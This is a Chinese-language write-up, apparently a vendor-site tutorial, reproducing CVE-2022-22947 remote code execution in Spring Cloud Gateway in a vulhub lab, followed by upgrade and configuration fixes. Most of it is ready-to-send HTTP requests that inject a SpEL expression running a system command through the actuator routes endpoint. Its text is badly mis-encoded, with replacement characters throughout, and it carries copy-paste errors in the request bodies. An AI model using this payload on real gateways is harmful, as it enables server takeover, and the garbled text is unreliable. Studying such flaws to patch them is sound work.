Spring?Cloud?Gateway遠(yuǎn)程代碼執(zhí)行漏洞實(shí)例分析
本篇內(nèi)容介紹了“Spring Cloud Gateway遠(yuǎn)程代碼執(zhí)行漏洞實(shí)例分析”的有關(guān)知識(shí),在實(shí)際案例的操作過(guò)程中����,不少人都會(huì)遇到這樣的困境,接下來(lái)就讓小編帶領(lǐng)大家學(xué)習(xí)一下如何處理這些情況吧���!希望大家仔細(xì)閱讀��,能夠?qū)W有所成�!
1.漏洞描述
Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 構(gòu)建的 API 網(wǎng)關(guān),它旨在為微服務(wù)架構(gòu)提供一種簡(jiǎn)單�、有效、統(tǒng)一的 API 路由管理方式��。
2.影響版本
3.1.0
3.0.0至3.0.6
Spring Cloud Gateway 其他已不再更新的版本
3.漏洞環(huán)境搭建
利用docker搭建漏洞復(fù)現(xiàn)環(huán)境
git pul #更新vulhub
切換到/vulhub/spring/CVE-2022-22947目錄
拉取漏洞環(huán)境
docker-compose up -d
訪問(wèn)http://192.168.42.145:8080
4.漏洞復(fù)現(xiàn)
添加包含惡意的路由
POST /actuator/gateway/routes/EchoSec HTTP/1.1
Host: 192.168.42.145:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 334
{
"id": "EchoSec",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"whoami"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
刷新網(wǎng)關(guān)路由
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.42.145:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 334
{
"id": "EchoSec",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"whoami"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
命令執(zhí)行成功
GET /actuator/gateway/routes/EchoSec HTTP/1.1
Host: 192.168.42.145:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 334
{
"id": "EchoSec",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"whoami"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
刪除添加的惡意路由
DELETE /actuator/gateway/routes/EchoSec HTTP/1.1
Host: 192.168.42.145:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 334
{
"id": "EchoSec",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"whoami"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
5.修復(fù)方案
1)3.1.x用戶應(yīng)升級(jí)到3.1.1+��;
2)3.0.x用戶應(yīng)升級(jí)到3.0.7+����;
3)如果不需要Actuator功能���,可以通過(guò)management.endpoint.gateway.enable:false配置將其禁用�����。
“Spring Cloud Gateway遠(yuǎn)程代碼執(zhí)行漏洞實(shí)例分析”的內(nèi)容就介紹到這里了��,感謝大家的閱讀���。如果想了解更多行業(yè)相關(guān)的知識(shí)可以關(guān)注億速云網(wǎng)站,小編將為大家輸出更多高質(zhì)量的實(shí)用文章����!
